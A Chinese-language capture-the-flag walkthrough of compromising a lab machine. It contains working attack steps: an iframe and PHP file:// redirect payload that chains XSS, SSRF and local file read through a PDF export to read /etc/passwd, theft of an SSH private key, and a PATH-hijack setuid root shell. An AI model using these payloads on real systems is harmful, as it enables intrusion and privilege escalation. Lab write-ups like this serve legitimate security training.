目录

一、主机发现

二、服务版本探测

三、信息收集

2.主页面

3.源码

4.尝试登录

四、分析功能

1.export输出pdf

2.edit profile编辑文件

五、存储型xss

 六、信息收集

1.export输出

七、组合拳XSS+SSRF+LFI

1.本地开启apache服务

2.注入payload

3.export触发

八、读取gemini私钥

2.ssh公私钥登录

 九、find信息查找

 十、二进制文件查看

1. /usr/bin/listinfo文件分析

2.执行情况

十一、 系统命令文件伪造

1.新建date文件

2.修改环境变量

3.执行listinfo

一、主机发现

半开扫描

nmap -sS ip

二、服务版本探测

三、信息收集

1.无法加载

80端口的资源无法被正常加载，因为一直在访问Google的某些站点，挂梯子访问。

2.主页面

源码地址给我们了

3.源码

逐个查看，在install文件夹下出现了[email protected]

4.尝试登录

 成功登录，左上角多了个功能

四、分析功能

1.export输出pdf

2.edit profile编辑文件

我们修改的资料会在资料版上原封不动的显示出来。用户名处不存在过滤，

五、存储型xss

不足以帮助我们突破边界

 六、信息收集

1.export输出

在文档属性中我们发现了一个应用。就是一个html转pdf的应用。

七、组合拳XSS+SSRF+LFI

 经过搜索，我们可以知道这个应用组件存在这三个漏洞。经过漏洞结合使用，来读取本地文件。

1.本地开启apache服务

systemctl start apache2

cd /var/www/html

sudo vim 1.php

创建一个1.php文件

写入：

<?php
    $file = $_GET['file'];
    header("location:file://$file");

2.注入payload

<iframe src="http://ip/1.php?file=/etc/passwd" width="100%" height=1220></iframe>

3.export触发

成功读取/etc/passwd文件。可以看到gemini可以通过shell登录

八、读取gemini私钥

保存到kali上

2.ssh公私钥登录

成功登录

 九、find信息查找

find / -type f -user root -perm -u+xs -ls  2>/dev/null

 十、二进制文件查看

1. /usr/bin/listinfo文件分析

strings  /usr/bin/listinfo

内容：

核心代码也就是这几句，调用了系统的命令

2.执行情况

十一、 系统命令文件伪造

1.新建date文件

vim date.c

内容：

#include<sys/types.h>
#include<unistd.h>
#include<stdlib.h>

int main(){
    setuid(0);
    setgid(0);
    system("/bin/bash");
}

2.修改环境变量

先从前面找，再从后面找

export PATH=/tmp:$PATH

3.执行listinfo

提权成功

 拿到flag.txt